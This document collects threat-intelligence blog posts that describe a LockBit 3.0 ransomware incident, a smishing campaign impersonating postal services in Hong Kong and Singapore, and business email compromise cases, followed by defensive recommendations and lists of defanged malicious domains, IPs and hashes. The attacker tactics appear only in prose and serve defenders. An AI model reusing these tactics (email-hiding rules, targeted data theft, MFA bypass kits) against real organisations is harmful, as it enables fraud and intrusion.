LockBit 3.0: New Capabilities Unlocked

LockBit persists as the most prominent Ransomware-as-a-Service (RaaS) groups in 2022, showcasing heightened capabilities in their LockBit 3.0 iteration and a persistent nature to continuously evolve.

As the LockBit RaaS group re-emerges with their new and improved ransomware, LockBit 3.0 (also known as LockBit Black), we observed new capabilities and a heightened sophistication based on their increased frequency of attack and speed to impact, posing an ever-growing threat to organisations worldwide.

PwC’s Dark Lab observed over 860 breaches between 1 October 2021 and 31 October 2022 attributed to the LockBit RaaS group. 19% of global LockBit incidents impacted the Asia Pacific (APAC) region, with industries most prominently targeted in the region being Professional Services and Manufacturing Services, comprising 44% of total incidents observed in APAC. Despite this, we assess they are still opportunistic by nature and these statistics reflect that potentially certain industries are more likely victims potentially due to their overall lower maturity of controls when compared to regulated industries.

Figure 1: Dark Lab Observed Over 860 LockBit Incidents from LockBit’s Leak Site between October 2021 and October 2022

Figure 2: Industry Breakdown of LockBit Targeting in APAC according to LockBit’s Leak Site

Comprising approximately 40% of all ransomware attacks against APAC observed between 1 October 2021 and 31 October 2022, LockBit presents a persistent threat to the region. This blog extends from our previous blogs covering LockBit 2.0 to focus on the new 3.0 iteration, highlighting novel tactics, techniques, and procedures (TTPs) observed in Dark Lab’s recent incident. [1] [2]

A Recent Encounter with LockBit 3.0

In Q3 2022, PwC’s Dark Lab responded and contained a ransomware attack against a Chinese multinational conglomerate. Attributed to the LockBit 3.0 RaaS group, this was concluded with high confidence based on a number of key indicators, aligning with LockBit’s typical attack vector.

Firstly, similar to previous LockBit 2.0 incidents observed by PwC’s Dark Lab, the vulnerability exploited to obtain valid credentials was a SSL VPN vulnerability. In this instance, CVE-2018-13379 was exploited – a vulnerability in Fortinet’s outdated FortiOS and FortiProxy versions whereby an authenticated attacker may exploit the SSL VPN web portal to download system files using custom HTTP requests. [3]

Secondly, PwC’s Dark Lab discovered the presence of the LockBit executable file .lockbit and the StealBit.exe information stealer tool in the compromised environment, both of which are commonly deployed malwares by the LockBit RaaS group. [4]

FilenameLockBit.exe
MD5ad2918181f609861ccb7bda8ebcb10e5
File TypeWin32 EXE
File Size163,328 bytes
FilenameStealbit.exe
MD572e3efc9f6c7e36a7fb498ab4b9814ac
File TypeWin32 EXE
File Size441,856 bytes

StealBit.exe is a versatile, configurable information stealer with observed customisable configurations including the ability to specify network limit, maximum file size, filtering of files by keywords and file extensions, and optional features such as self-deletion and ScanShares.

A notable observation of the StealBit.exe running process was the list of keywords to filter and identify files for exfiltration, including keywords used to target files relating to specified insurance companies. Dark Lab hypothesises StealBit.exe was used to target information on the victim organisation’s insurance policy to understand their coverage pertaining to data breaches and ransomware attacks and adapt their ransom price accordingly. We posit this is a means of increasing the likelihood of their demanded ransom payment by targeting the victim’s insurance coverage, meaning that ransom payment would be covered by the insurance company, rather than the victim itself. Further, we observe keywords such as ‘violation’, ‘tax’, ‘evasion’, likely to collect evidence of the targeted victim’s misconduct to use as blackmail in the event the victim refuses to pay the ransom.

In examining the encryption process of lockbit.exe, we observed the total encryption speed of 3.8 minutes for 3,957 files (total file size 3080.16 mega byes), approximating an encryption speed of 13.6 megabytes per second. This comparatively fast encryption speed shows heightened capability of the LockBit ransomware, observed by various security researchers to have the highest encryption speed across ransomwares. [5]

Thirdly, Dark Lab observed a notable differentiator in comparison with previous LockBit 2.0 encounters – the presence of legacy RaaS group, BlackMatter’s code embedded in the LockBit codebase, signifying that the LockBit 3.0 iteration was executed in this incident. BlackMatter is a notorious RaaS group active from July 2021 to October 2021 known for targeting the U.S. health sector and suspected to be a rebranding of the DarkSide RaaS group. [6]

As observed by security researchers in the wake of LockBit 3.0, the new iteration of LockBit appears to borrow code from the legacy group with notable new features adopted from BlackMatter. This was further validated in an interview with the alleged LockBit founder, confirming that in preparation of LockBit 3.0, the group purchased the BlackMatter source code to enhance the ransomware. [7] Features utilised from the BlackMatter source code include API harvesting for privileged escalation, self-deletion of shadow copies using WMI via COM objects and the elimination of pre-existing bugs. [8]

Further investigation into the lockbit.exe executable file confirmed traces to LockBit 3.0. As evidenced below, the malware is a known malicious file matching YARA rules pinpointing relations to LockBit and BlackMatter respectively.

Figure 3: VirusTotal flagged that the LockBit executable file indicated matches to LockBit and BlackMatter
Figure 4: Evidence of LockBit 3.0 ransomware deployed in incident “95ddbeacd79ad7d944e75f55ca323a13076b756c4accefd28e206a76b3ea268b”  and confirmed association with BlackMatter

The Future of LockBit

The LockBit RaaS group has proven persistence and no means of halting operations. This is observed in the first-ever ransomware bug bounty program launched by the group in June 2022, awarding up to US$1 million to anyone able to identify critical bugs or provide innovative ideas to enhance their LockBit 3.0 ransomware. This not only exemplifies their financial viability, but it implies their intention to continue enhancing their offerings as a means of providing high consumer confidence and to retain and grow their affiliate base.

Figure 5: Screenshot of LockBit’s Bug Bounty Program Advertised on their Leak Site
Figure 6: Screenshot of LockBit’s Bug Bounty Program Advertised on their Leak Site

LockBit is recognised as a leader in the RaaS landscape, offering one of the best affiliate recruitment programs. This is largely due to their unique payment structure which favours affiliates and their lack of political association. [9] In an interview with an alleged LockBit member held in July 2022, the LockBit representative accredits their successful affiliate recruitment program to their emphasis on “honesty”, priding themselves as the only affiliate group known to “not touch the ransoms obtained by partners”. [10]

In a more recent interview on 30 October 2022, the blog vx-underground [11] spoke with the alleged founder of LockBit on the affiliate payment structure and origin story of the group. It was confirmed that LockBit’s founding members gain a 20% cut of affiliates’ profits, with this increasing to 30-50% in the event that the affiliate requires additional support from the group in performing negotiations with the targeted victim. The representative further confirmed that LockBit currently comprises of 10 core members (including pen testers, money launderers, testers, and negotiators) and an affiliate base of over 100 affiliates – which they aspire to grow to 300.

As observed in both interviews, LockBit has secured themselves as a market leader in the RaaS landscape due to their favourable payment structure, strong affiliate support system, and neutral political stance. As implied in the latest interview, the group endeavours to continue expanding their affiliate base which will reflect in a continuous enhancing of their ransomware products to differentiate themselves amongst other RaaS operators to attract new joiners. We posit that the RaaS scene will continue to expand as the competitive landscape will drive more effective, enticing ransomware packages – increasing accessibility and scale of operations for financially-driven low skill-levelled hackers – complete with instructions, toolkits, and custom malware to execute large-scale attacks.

Notably, LockBit affiliates are known to re-use known initial access points (e.g. SSL VPN vulnerabilities – Citrix Gateway (CVE-2019-19781), Pulse Secure (CVE-2019-11510), Fortinet FortiOS (CVE-2018-13379)). However, as per our post on LockBit 2.0’s SonicWall exploit to bypass multi-factor authentication (MFA) [12], the group is not averse to deviating from their usual attack path as we observed the affiliate chain a known SQLi vulnerability (CVE-2019-7481 or CVE-2021-20028) with an undisclosed zero-day vulnerability to circumvent the MFA access control of the victim’s SonicWall SRA SSL VPN.

A further evolution in LockBit’s attack path is their announcement to begin executing triple extortion tactics. This is in retaliation of the incident with security company Entrust, in which LockBit’s corporate data leak site was targeted by a Distributed Denial of Service (DDoS) allegedly executed by Entrust to stop Lockbit from leaking Entrust’s compromised data. This prompted LockBit RaaS to announce they will add a third extortion tactic, for maximum impact on targeted victims.

Figure 7: LockBit’s Triple Extortion Attack Path

Conclusion

LockBit 3.0 affiliates work on behalf of the LockBit group to conduct ransomware campaigns against organisations and industries across the globe. As previously posited in our technical analysis of LockBit 2.0 [13], the RaaS group is financially-driven and through these incidents we observed, affiliates with a diversified capability and skillset exploit are observed to exploit SSL VPN vulnerabilities to circumvent the MFA access control and obtain initial access. Organisations are encouraged to review the TTPs leveraged by LockBit affiliates as a result of our recent incident response experience to improve their preventive and detective controls.

Check out our previous LockBit blogs for the full technical analysis:

  • LockBit 2.0 affiliate’s new SonicWall exploit bypasses MFA [14]
  • Technical analysis of LockBit 2.0 affiliates’ SonicWall exploit that bypasses MFA [15]

Recommendations

As RaaS groups continuously persist and evolve their attack vectors, it is vital that organisations implement robust, layered defence strategies based on the concept of zero trust.

Preventative

  • Enforce a layered defence strategy incorporating secure network security protocols (including but not limited to firewall, proxy filtering, intrusion detection systems (IDS), intrusion prevention systems (IPS), secure VPNs and security gateways).
  • Optimising security application configurations for effective coverage, tailoring rules and configurations to business needs, or ensuring that out-of-the-box (OOTB) configurations provide adequate coverage.
  • Update your blacklist with the indicators of compromise (IoCs) shared below and block outgoing network connections to the identified C2 server. We encourage you to visit our previous LockBit blogs for an expansive list of LockBit IoCs identified by PwC’s Dark Lab.
  • Disable unused administrative ports internally, such as Remote Desktop Protocol (RDP).

Detective

  • Identify, detect, and investigate abnormal activity and potential traversal of the threat actor across the network, such as ensuring coverage of Endpoint Detection and Response (EDR) tools on critical endpoints, including workstations, laptops and servers.
  • Regularly scan your network environment for potential vulnerability(s) exposure and remediate immediately, such as deploying available patches, establishing regular schedules updates and periodically reviewing configuration settings for potential misconfigurations.
  • Conduct a search of historical logs to detect for any potential presence in your network environment, ensuring that an alert system is established should any indicators be identified. If any indicators are discovered, it is advised that a digital forensic investigation is conducted to identify the potentially foregone impact, including the compromised information and systems, and apply the appropriate containment and remediation measures.

Indicators of Compromise (IoCs)

We include the observed IoCs in our encounter with LockBit 3.0.

IndicatorFile Type
162[.]214[.]152 [.]179External server of StealBit
72e3efc9f6c7e36a7fb498ab4b9814acStealbit.exe
ad2918181f609861ccb7bda8ebcb10e5Lockbit.exe
131[.]107[.]255[.]255IP Address
23[.]216[.]147[.]64IP Address
20[.]99[.]132[.]105IP Address

Further information

Feel free to contact us at [threatintel at darklab dot hk] for any further information.

Hong Kong and Singapore Citizens Actively Targeted by Large-Scale Global Smishing Campaign

PwC’s Dark Lab uncovers a large-scale smishing campaign actively targeting Hong Kong and Singapore citizens by masquerading as trusted and reputable locally based public and private postal service providers.

On 21 September 2022 , PwC’s Dark Lab observed SMS phishing (smishing) activity targeting mobile users in Hong Kong. The message masqueraded as the postal service Hongkong Post – a government department of Hong Kong responsible for postal services – delivering a package to the victim. We posit that the intended purpose was to steal victims’ personally identifiable information (PII) and credit card details, based on similar information posted on social media.

Smishing campaigns via the fraudulent use postal services are far from uncommon and has increased at an alarming rate as a result of the Covid-19 pandemic. We previous reported on a global campaign impacting Hong Kong, Macau, and Singapore users per our March 2022 blogpost “Smells SMiShy to me…”.[1] This latest campaign caught our attention primarily as it seemed to be an active, large-scale smishing campaign impacting multiple Asia Pacific countries, including Hong Kong and Singapore. We release this blog post concurrent to the ongoing campaign to raise awareness among enterprises and individuals and will continue tracking the threat actor’s activities as the campaign progresses.

Impersonating Hongkong Post

On 21 September 2022, PwC’s Dark Lab observed that Hongkong Post’s Track and Trace portal was being imitated by the newly registered domain hkpoieq[.]com. The domain was no more than one (1) day of age, and requested victims to ‘change their delivery address’ for a fake order “AS658237789HK”. We did not observe the domain to have a mail exchanger (MX) record, which indicated that the threat actor did not intend for this domain to be received via email.

Figure 1: Screenshot of the fraudulent Hongkong Post webpage that was hosted on hkpoieq[.]com

Upon further inspection of the domain, we observed that hkpoieq[.]com resolved to the IP address 155[.]94[.]163[.]222. The threat actor subsequently leveraged the same IP address to register an additional three (3) domains between 22 to 29 September 2022 – hkpoist[.]com, hkpoivt[.]com, and hkpoiec[.]com. The domains seemingly adopted a consistent naming convention whereby the alpha-2 ISO country code[2] was prefixed with an additional five (5) seemingly randomised letter characters. These domains were also registered across a short period of time and proceeded to be unresolvable relatively quickly (under 3 days), thus we were not able to obtain further information beyond the first screenshot to verify the objective of the impersonation. The short time in which the domains remained unresolvable meant that security vendors did not have opportune time to detect the domains and IP address as malicious as of the time of writing[3], which increases the challenge to detect and respond in a timely manner.

However, we were able to retrieve a separate smishing message with a separate domain hkrocit[.]com that also impersonated Hongkong Post on 9 October 2022.

Figure 2: Smishing Message from threat actor to Hongkong Post customer. Translation: “The courier delivery failed to be delivered by the courier without a signature. Please update your address at hkrocit[.]com

Though the naming convention of the domain hkrocit[.]com followed a similar format as hkpoieq[.]com, we could not immediately correlate the two as the second domain resolved to a different IP address 155[.]94[.]140[.]247. Yet upon deeper inspection, we observed that both domains had been registered under the same Internet Service Provider (ISP) QuadraNet Enterprises LLC (QuadraNet) with an Autonomous System Number (ASN) 8100. Furthermore, the threat actor continued the same pattern of operations by registering new domains, though with greater frequency amounting to a total of 12 domains over 14 days (details in the Indicator of Compromise section). As of the time of writing, we have not observed further domains resolving to this IP address since they were flagged malicious on 14 October 2022.[4]

Given both a similar naming convention, a similar ASN and ISP, as well as the similar pattern of newly registered domains impersonating the same service provider, we assess with moderate confidence that it is the same threat actor conducting a persistent smishing campaign targeting Hong Kong citizens.

During our pivoting, we also observed that there were three (3) domains registered between 29 September 2022 and 10 October 2022 that began with “sg” and resolved to 155[.]94[.]140[.]247. We extended our logic that the domain’s first two letters were the alpha-2 ISO country code, and through open-source investigation was able to observe that sgpoist[.]com had previously impersonated Singapore Post Limited (SingPost), which is the designated public postal licensee for Singapore. This gave weight to our hypothesis on the domain naming convention and increased our confidence level that it is a campaign that extends targeting beyond Hong Kong and to other countries such as Singapore.

Figure 3: Observing from records of previously conducted public searches on sgpoist[.]com to validate our hypotheses on the domain naming convention and identifying that the threat actor also impersonated Singapore Post Limited

The Final Confirmation…

The final confirmation that the threat actor has previously targeted other Asia Pacific countries such as Japan with an objective of steal victims’ PII and credit card details was obtained through various posts on the social media platform Twitter. A simple search on 155[.]94[.]140[.]247 revealed that security researchers previously alerted the public in April 2022 of phishing campaigns impersonating reputable retailers such as AEON[5] and Amazon Japan[6], highlighting QuadraNet as the questionable ISP.

Figure 4: Twitter posts that flag 155[.]94[.]140[.]247 as suspicious in April 2022 given impersonation of AEON and Amazon Japan

Similarly, on 23 September 2022, local news station Channel C HK reported on a similar case whereby four (4) teenagers were detained by Hong Kong Police Force for using stolen credit cards to purchase electronic devices. Their investigation found that the group allegedly obtained the stolen credentials by operating a fake Hongkong Post website and linking a mobile payment tool to the site to make purchases with the stolen credit card information.[7] While there is insufficient information to draw a correlation between both cases, this incident provides further insight into the likely motivations and intended impact of the threat actors behind QuadraNet. This is the final validation to strengthen our assessment that this is a large-scale phishing campaign likely initiated by cybercriminals that sought to gain profit via sale of PII and credit card information.

Target Shifted: Observing the Threat Actor Impersonating S.F. Express

As of the time of writing, we observed that the campaign is likely ongoing though the behaviors of the threat actor has slightly changed. For example, S.F. Express is now the organisation being impersonated, with domains such as hkrzit[.]com, hkrmit[.]com, and hkrlit[.]com being registered between 13 and 14 October 2022. The naming convention has also altered slightly, with the alpha-2 ISO country code now only prefixed with an additional four (4) seemingly randomised letter characters instead of the original five (5) letter characters. We posit that the threat actor will continue to conduct smishing to obtain PII and credit card information from unsuspecting victims, likely those based in Hong Kong.

Figure 5: Screenshot of the fraudulent S.F. Express webpage that was hosted on hkrzit[.]com

Conclusion – To Be Continued…

PwC’s Dark Lab observes that Hong Kong and Singapore are actively being targeted by a global large-scale persistent smishing campaign. We strongly encourage citizens to practice caution and awareness when interacting with communications, particularly of SMS origin as a result of the recent campaign. PwC’s Dark Lab will continue to monitor campaigns of varying scales, not just those that may target enterprises but also those that impact individuals. We will continue to investigate this ongoing campaign and invite readers to stay tuned for further updates and insights.

Recommendations for Individuals

  • Users should remain wary of the legitimacy of webpages and their branding, and access websites via the global webpage as opposed to the URL shortened link if in doubt.
  • If you accidentally visit a phishing site, do not click on any links and check if any files were downloaded. Monitor your email’s ‘sent’ folder to identify if any unauthorized emails have been issued from your account. Alert the receiver, as well as your wider contact list that you may have fallen victim to a phishing attack so they can be on alert that incoming messages from your account may not be legitimate.
  • If you believe you have fallen victim to a phishing attack, we recommend that you perform a password reset, enable MFA, and report the suspected phishing activity immediately to your credit card issuers (and organisation if accessed the site through your work device) to monitor and restrict potentially suspicious activity.

Recommendations for Organisations

  • Organisations should conduct young domains monitoring and alert against potentially suspicious domains for further action – this is typically conducted by your Security Operations Centre. For this particular case, we suggest to look for domains that have four (4) or five (5) randomised letter characters appended to alpha-2 ISO country codes for the countries they operate in. We have already informed Hongkong Post and S.F. Express to investigate, and if necessary perform takedown of fake domains.
  • Organisations should enforce a layered defense strategy, incorporating both defensive and preventative protocols. This includes enforcing a zero trust network and organisation-wide.
  • Organisations should update their email security solution and network devices (including external firewall, web proxies) to detect for potential inbound/outbound connections from the known-bad domains and IP addresses in this post.
  • Registrars should enhance their onboarding due diligence to reduce the risk of provisioning domains impersonating legitimate brands and conduct regular review activities of those domains to ensure their use for ethical and non-malicious activities. 
  • Read our blog about Business Email Compromise (BEC) to learn more about targeting against organisations and the recommendations of how to prevent, detect and respond to a BEC attack.[8]

Indicators of Compromise (IoCs)

IoCType
155[.]94[.]140[.]247 IP Address
155[.]94[.]163[.]222IP Address
hkpoivt[.]comMalicious Domain
xiewen[.]xyzMalicious Domain
hkpoiec[.]comMalicious Domain
hkpoieq[.]comMalicious Domain
hkpocn[.]comMalicious Domain
hkpoir[.]comMalicious Domain
hkpoie[.]comMalicious Domain
hkpoet[.]comMalicious Domain
hkpoik[.]comMalicious Domain
hkpoim[.]comMalicious Domain
hkpois[.]comMalicious Domain
hkpoei[.]comMalicious Domain
hkrmit[.]comMalicious Domain
hkrzit[.]comMalicious Domain
hkrlit[.]comMalicious Domain
hkrxit[.]comMalicious Domain
hkrcit[.]comMalicious Domain
hkrocit[.]comMalicious Domain
hkromit[.]comMalicious Domain
hkroist[.]comMalicious Domain
hkpoist[.]comMalicious Domain
hkporut[.]comMalicious Domain
linkblti[.]comMalicious Domain
hkrqit[.]comMalicious Domain
hkrwit[.]comMalicious Domain
hkrocit[.]comMalicious Domain
hkrzit[.]comMalicious Domain
hkrlit[.]comMalicious Domain
cadpoxit[.]comMalicious Domain
hkrxit[.]comMalicious Domain
cadpocit[.]comMalicious Domain
hkrcit[.]comMalicious Domain
hkrocit[.]comMalicious Domain
hkromit[.]comMalicious Domain
hkroist[.]comMalicious Domain
sgpardrt[.]comMalicious Domain
hkpoist[.]comMalicious Domain
hkporut[.]comMalicious Domain
sgporut[.]comMalicious Domain
sgpoist[.]comMalicious Domain
cadporv[.]comMalicious Domain
cadporc[.]comMalicious Domain
mazsn[.]comMalicious Domain
anazch[.]comMalicious Domain
anazc[.]comMalicious Domain
anazcm[.]comMalicious Domain
aeomn[.]comMalicious Domain
anazsm[.]comMalicious Domain
singpirt[.]comMalicious Domain
hkpoivt[.]comMalicious Domain
hkpoiat[.]comMalicious Domain
hkpoiec[.]comMalicious Domain
hkpoieq[.]comMalicious Domain
foodpre[.]comMalicious Domain
likntbl[.]comMalicious Domain
gobmxp[.]comMalicious Domain
xwssr[.]xiewen[.]xyzMalicious Domain
ssr[.]xiewen[.]xyzMalicious Domain
xiewen[.]xyzMalicious Domain
cloud[.]thexw[.]cnMalicious Domain
ssr[.]thexw[.]cnMalicious Domain

Further information

Feel free to contact us at [threatintel at darklab dot hk] for any further information.

Phishing for Profit: Business Email Compromises

There are plenty of phish in the sea and they’re back with new tricks! Dark Lab responds to multiple business email compromise campaigns targeting Hong Kong. We outline two recent incidents, sharing the Tactics, Techniques, and Procedures (TTPs) observed, and recommendations on how to prevent, detect, and respond to a phishing attack.

Business email compromise (BEC) is a social engineering attack which broadly refers to a malicious threat actor attempting to defraud organisations by hacking into their email accounts and impersonating employees and third parties. These phishing attacks have existed for many years, though remain prevalent due to their ability to continuously illicit emotional reactions of victims, thereby triggering an unintended response such as performing actions that lead to undesirable consequences. This is further exacerbated by the fact that BEC attacks typically yield a high return on investment given the low cost of setup and ability to scale operations globally.

The impact of BEC attacks are most evident in the amount of reported losses. The Federal Bureau of Investigation (FBI) reported that BEC attacks amounted to a staggering US$43 billion financial loss globally between 2016 to 2021.[1] Meanwhile, the Hong Kong Computer Emergency Response Team Coordination Centre (HKCERT) reportedly handled 3,737 phishing incidents in 2021, which represented almost half of the total reportedly handled incidents and was up 7 percent from 2020, rising for the fourth consecutive year.[2]

PwC’s Dark Lab also responded to an increased number of BEC campaigns in 2022. Two particular incidents stood out for their automated “spray and pray” approach to achieve initial access, followed by performing calculated and stealthy manual actions to persist in the Microsoft 365 environment to facilitate ongoing reconnaissance with the aim of effectively impersonating their victim to convince other staff members to approve fund transfers to the threat actor’s bank account. We elaborate the tactics, techniques and procedures (TTPs) that these threat actors leveraged and provide our recommendations on how to prevent, detect, and respond to BEC attacks should they befall your organisation. We further examine the rising trend of phishing kits in large scale phishing operations, enabling low-skilled threat actors to develop compelling phishing campaigns and bypass multi-factor authentication.

Case Study: Global Campaign by Opportunistic Cybercriminal of Unknown Origin

PwC’s Dark Lab responded to an incident in 2Q 2022 that involved a local property investment, management, and development company. The victim’s Microsoft Office 365 account was compromised via a phishing email from the sender domain macopas[.]com, with a link re-directing the victim to a fake Outlook login portal developed and hosted by the threat actor. To convince the victim to provide their password, the Outlook page pre-populated their email address. Given the victim’s mailbox did not have multi-factor authentication (MFA) enabled, the threat actor could obtain full access to the mailbox with a valid password.

The threat actor proceeded to perform three (3) manual actions to persist in the environment and gain more insights on the business operations while remaining hidden. First, the threat actor created various mail rules for moving and/or deleting emails with keywords associated with the threat actor’s access activities. Second, the malicious billing email was sent directly from the victim’s mailbox to various internal staff. Third, a malicious Azure enterprise application named “Newsletter Software SuperMailer” was created by the victim’s account for persisted access; this was particularly useful as the threat actor successfully performed re-logon to the compromised account even after the password was updated. The threat actor was only denied re-entry after MFA for the victim’s mailbox was enforced.

Through review of the available logs, we were able to observe through email trace that the attacker-controlled IP address delivered the same phishing emails to over three hundred (300) addresses of the victim organisation in alphabetical order. Meanwhile, we discovered through open-source information that similar emails had been sent to at least twenty (20) additional organisations globally. Combined with the fact that the threat actor was observed to only perform the first login two days after the password was inputted suggested they spent time to retrieve, study, and utilise their haul of phished credentials. These indicators and behaviour are more reflective of an opportunistic “spray and pray” campaign given the lack of urgency to quickly establish persistence. This is also evident in the end-to-end incident period lasting just under ten (10) days.

Case Study: Nigerian Cybercriminals Exploit Trusted Relationships with Hong Kong Branch Employee to Commit Cyber Fraud

PwC’s Dark Lab responded to a second BEC incident in 3Q 2022 involving a Chinese e-payment terminal solutions service provider with global operations. Similar to the case above, MFA was not enabled, and the threat actor was observed to host phishing domains imitating the Outlook login portal, enabling the threat actor to obtain initial access with valid credentials. This case left a lasting impression for three reasons.

First, the threat actor spent up to three (3) weeks familiarising themselves with ongoing operations by logging in remotely from multiple geolocations (including United States, Australia, Germany, and Nigeria) and modifying various mail rules and contact lists before executing their attack. The inbox rules hide emails specific to the transaction being targeted (e.g. emails from the legitimate parties, emails with transaction references numbers or bank accounts in the body). The emails are moved to a lesser viewed “RSS Feeds” folder with “Mark as Read” enabled in attempt to hide legitimate emails from the victim’s sight.

Second, the threat actor registered a new domain to impersonate the victim in Hong Kong to send emails to European counterparts . Notably, the threat actor embedded their phishing emails within existing conversations – an evasive tactic to exhibit legitimacy by using conversations with established trust. One of the seven (7) phishing emails contained a malicious link (secure[.]membra[.]co[.]uk) that appeared “clean” as it had not been reported as suspicious. However, through deeper inspection we observed the underlying IP address (45[.]153[.]240[.]153) was reported to be malicious, previously associated with other subdomains mimicking as the Microsoft O365 login page, likely used for global phishing campaigns.

Associated domains – likely past phishing campaigns
login-mso[.]cscsteelsusa[.]com
ogin-mso[.]cscsteelsusa[.]com
wwwoffice[.]cscsteelsusa[.]com
login[.]cscsteelsusa[.]com
Live Screenshot (as of 6/10/22) of login-mso[.]cscsteelsusa.com

Third, the threat actor practiced poor operational security including the inconsistent use of a virtual private network (VPN); as a result, they may have potentially disclosed that they operate out of Nigeria. While none of the Nigerian IP addresses were reported as malicious across various open-source security tools, Nigeria has been widely reported by security researchers to be a hotspot for cybercrime activity related to business email compromise attacks.[1] Overall, based on the investigation on open-source platforms leveraging the indicators of compromise from the incident, we conclude with high confidence that the incident was part of a larger-scale mass phishing campaign that opportunistic cybercriminals – likely out of Nigeria – conducted without the intention to target a specific sector or country, and with the motivation of transferring illicit funds to fraudulent bank accounts for financial gain.

Nigerian IP addresses
41[.]184[.]152[.]104
41[.]217[.]70[.]163
154[.]118[.]65[.]105

Phishing Kits bypass MFA

PwC’s Dark Lab observe the prevalent development of phishing kits (also known as adversary-in-the-middle (AiTM)), with over 10,000 organisations targeted by phishing kit attacks since September 2021. AiTMs provide a phishing toolkit as a service for attackers with low technical skills to execute a convincing phishing attack. AiTM phishing kits are easily accessible for attackers on the dark web with various open-source phishing kits available, including prominent providers Evilginx2[4], Modlishka[5], and Muarena[6].

AiTM phishing sites exercise a strong capability, as they enable attackers to deploy a proxy server between a target user and the website the user is attempting to visit – intercepting the connection by redirecting to the attacker’s phishing site. By targeting the authentication token, rather than raw credentials and/or MFA tokens, the phishing kit enables the attacker to steal a fully authenticated session from the victim, effectively bypassing MFA.[7]

As the trend of MFA enforcement by organisations and individuals continue to rise, it is expected that phishing campaigns will move away from traditional phishing methods towards the use of AiTM to overcome the barrier that MFA presents. As threat actors evolve to find innovative ways to circumvent controls and lower the barriers to entry, it becomes even more important for defenders to keep pace with these trends and understand how to prevent, detect, respond, and recover from such attacks.

Conclusion

As evidenced in both case studies, threat actors orchestrating large scale phishing campaigns pose a significant challenge for targeted victims. This can be observed in the actors’ willingness to wait up to three (3) to four (4) weeks before taking action, using the buffer period to build a strong understanding of the victim’s processes to effectively imitate their victim and evade suspicion.

In both cases, we observed oversights in the victim organisations’ security stance which ultimately resulted in their exposure to a BEC attack. In both cases, if multi-factor authentication (MFA) had been enabled, this could have prevented the threat actor from gaining access. Similarly, had the second victim organisation established rules to detect abnormal logins, such as flagging an IP address for suspicious activity if observed to have multiple geolocations over the span of a week, the organisation could have detected the suspicious activity at an earlier stage and prevented further action.

To effectively protect against phishing and BEC attacks, it is vital that organisations enforce a layered defense strategy – combining robust preventative measures with intuitive detective protocols.

Recommendations

While phishing legitimate brands and business email compromises will remain a problem, companies can take action to mitigate and prevent the threat they pose.

  • Enhance security controls by establishing procedures in defining “significant” financial transactions and their respective handling procedures, for example automatic bank notifications for outbound transaction verifications and mandatory out-of-band verifications of bank account changes.
  • Develop and exercise a layered defense strategy, incorporating well-defined preventative and detective measures.
  • Organisations should review their Microsoft 365 configuration and update their email security solutions and network devices (including external firewall, web proxies).
  • Implement conditional access rules configuring with Geo-location/IP address restriction to reduce the risk of unauthorised overseas access to O365. For example, a regular review of authentication records for key financial staff members (i.e. Chief Financial Officer, Financial Controller, etc.)
  • Organisations should establish rules to restrict unauthorised devices from accessing company resources. For example, enforcing limitations on what devices can access company resources and creating onboarding procedures to enrol authorised devices, such as an employee’s personal mobile phone, before they are able to access company resources.
  • Enforce strong multi-factor authentication (MFA), such as number matching, for all users.
  • To protect against AiTM attacks, it is advised that organisation implement a layered defense strategy that incorporates MFA in conjunction with various preventative and defensive measures. This includes implementing MFA that supports Fast ID Online (FIDO) v2.0 and certificate-based authentication, enabling conditional access policies, and continuous monitoring for abnormal activities.
  • Implement periodic checking process to detect suspicious behaviour such as abnormal logins, mailbox rules, email forwarding rules, and application consent activities.
  • Organisations should conduct young domains monitoring and alert against potentially suspicious domains for further action (e.g., domain takedown). This task is typically conducted by our Security Operations Centre for subscription clients, and supported by our Cyber Threat Operations function which includes the Threat Intelligence and Incident Response pillars.
  • Conduct regular awareness training to educate the workforce on how to detect suspicious activity, highlighting new TTPs and clear warning signs, and provide clear instructions on the steps to take if they believe they have been targeted by a phishing email. Awareness training can also be completed in the form of phishing simulations to test employees’ susceptibility to phishing emails and fraud (i.e. simulate a sudden change of bank account information to determine if the relevant team detects the unusual behaviour and responds accordingly).
  • Users should remain wary of the legitimacy of webpages and their branding, and access websites via the global webpage as opposed to the URL shortened link if in doubt. BEC-impacted companies should issue circulars and alerts as necessary when impersonation attempts are detected .
  • We further advise organisations to establish a O365 mailbox rule to detect inbound/outbound traffic from the malicious IP listed in our Indicators of Compromise (IoC) section.

MITRE ATT&CK TTPs Leveraged

We include the observed MITRE ATT&CK tactics and techniques elaborated from the incident.

  • Acquire Infrastructure: Domains – T1583.001
  • Virtual Private Server – T1583.003
  • Botnet – T1583.005
  • Compromise Email Accounts – T1586.002
  • Phishing – T1566
  • Spear Phishing Link – T1566.001
  • Trusted Relationship – T1199
  • Email Hiding Rules – T1564.008
  • SharePoint – T1213.002
  • Remote Email Collection – T1114.002

Indicators of Compromise (IoCs)

IndicatorType
www[.]yinqsite[.]comKnown bad domains
login-microsoftonnex-mso[.]yinqsite[.]comKnown bad domains
yinqsite[.]comKnown bad domains
ogin-mso[.]wonjiinco[.]coKnown bad domains
glprop-okta-2f0bc4a0[.]wonjiinco[.]comKnown bad domains
stscn-lenovo-c9b8a5aa[.]wonjiinco[.]comKnown bad domains
msaauth-msasafety-95cce817[.]wonjiinco[.]comKnown bad domains
sts-glb-nokia-a6db40b3[.]wonjiinco[.]comKnown bad domains
sts-posteitaliane-694c6373[.]wonjiinco[.]comKnown bad domains
gas-mcd-37816100[.]wonjiinco[.]comKnown bad domains
login-mso[.]wonjiinco[.]comKnown bad domains
wonjiinco[.]comKnown bad domains
ogin-mso[.]cscsteelsusa[.]comKnown bad domains
wwwoffice[.]cscsteelsusa[.]comKnown bad domains
login[.]cscsteelsusa[.]comKnown bad domains
sts01-nestle-382a43f3[.]cscsteelsusa[.]comKnown bad domains
stscn-lenovo-a3ae4e78[.]cscsteelsusa[.]comKnown bad domains
fs-ncoc-a241b101[.]cscsteelsusa[.]comKnown bad domains
login-mso[.]cscsteelsusa[.]comKnown bad domains
www[.]cscsteelsusa[.]comKnown bad domains
kolroff[.]comKnown bad domains
xsbrane[.]comKnown bad domains
cscsteelsusa[.]comKnown bad domains
belasting-betalen[.]financeKnown bad domains
domain macopas[.]comKnown bad domains
95[.]216[.]126[.]229IP address
15.204.25.141IP address
Newsletter Software SuperMailerEnterprise application created by threat actor
45[.]153[.]240[.]153IP address
185[.]54[.]228[.]88IP address
185[.]202[.]175[.]6IP address
103.231[.]89[.]230IP address
41[.]184[.]152[.]104IP address
155[.]94[.]141[.]30IP address

Further information

Feel free to contact us at [threatintel at darklab dot hk] for any further information.

The Black Cat’s Out of the Bag

